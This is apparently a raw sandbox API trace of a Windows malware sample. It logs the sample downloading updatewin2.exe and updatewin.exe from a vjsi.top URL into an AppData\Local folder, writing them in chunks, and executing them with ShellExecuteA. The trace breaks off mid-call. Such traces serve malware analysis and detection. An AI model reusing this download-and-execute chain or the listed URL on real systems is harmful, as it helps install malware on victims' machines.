1 [0113.759] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0117.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f7c0 | out: hHeap=0x4970000) returned 1 [0117.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b118 | out: hHeap=0x4970000) returned 1 [0117.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0117.070] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0117.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf26f8 [0117.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdcfba90 [0117.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdcf26f8, cbMultiByte=-1, lpWideCharStr=0xdcfba90, cchWideChar=1072 | out: lpWideCharStr="http://vjsi.top/files/penelop/updatewin2.exe") returned 45 [0117.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0x7516fe8 [0117.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfba90 | out: hHeap=0x4970000) returned 1 [0117.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf26f8 | out: hHeap=0x4970000) returned 1 [0117.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdcfba90 [0117.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0117.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://vjsi.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0xdcd2280, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://vjsi.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0117.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0117.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0117.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfba90 | out: hHeap=0x4970000) returned 1 [0117.071] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://vjsi.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0117.442] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0117.442] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xdccd6d0, lpdwBufferLength=0xdccd710, lpdwIndex=0x0 | out: lpBuffer=0xdccd6d0*, lpdwBufferLength=0xdccd710*=0x4, lpdwIndex=0x0) returned 1 [0117.442] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2818 [0117.442] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0117.442] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2818 | out: hHeap=0x4970000) returned 1 [0117.442] lstrcpyA (in: lpString1=0x74fb668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" [0117.442] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe") returned 1 [0117.442] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0117.442] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0117.443] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.443] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.561] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.562] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.709] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.709] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.710] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.710] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.710] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.711] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.761] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.762] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.762] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.763] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.764] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.764] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.765] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.765] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.766] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.766] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.820] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.822] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.823] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.823] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.824] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.824] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.825] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.826] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.886] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.887] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.887] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.888] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.888] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.889] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.889] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.890] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.890] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.890] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.891] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.891] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.941] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.941] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.942] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.942] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.943] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.944] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.945] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.946] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0117.947] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.947] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x1200) returned 1 [0117.948] WriteFile (in: hFile=0x6b8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x1200, lpOverlapped=0x0) returned 1 [0117.948] CloseHandle (hObject=0x6b8) returned 1 [0117.953] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0117.960] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0117.960] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0118.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0118.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0118.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0118.021] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0118.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750bee8 [0118.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85e) returned 0xdcfba90 [0118.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x750bee8, cbMultiByte=-1, lpWideCharStr=0xdcfba90, cchWideChar=1071 | out: lpWideCharStr="http://vjsi.top/files/penelop/updatewin.exe") returned 44 [0118.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0118.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfba90 | out: hHeap=0x4970000) returned 1 [0118.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bee8 | out: hHeap=0x4970000) returned 1 [0118.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdcfba90 [0118.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82f) returned 0xdcd2b08 [0118.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://vjsi.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0xdcd2b08, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://vjsi.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0118.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0118.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0118.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfba90 | out: hHeap=0x4970000) returned 1 [0118.022] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://vjsi.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0118.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0118.244] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xdccd6d0, lpdwBufferLength=0xdccd710, lpdwIndex=0x0 | out: lpBuffer=0xdccd6d0*, lpdwBufferLength=0xdccd710*=0x4, lpdwIndex=0x0) returned 1 [0118.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750bee8 [0118.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f80 [0118.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bee8 | out: hHeap=0x4970000) returned 1 [0118.244] lstrcpyA (in: lpString1=0x74fb668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" [0118.244] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b", pMore="updatewin.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe") returned 1 [0118.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0118.244] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0118.247] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.247] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.345] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.347] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.398] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.398] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.399] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.399] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.407] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, 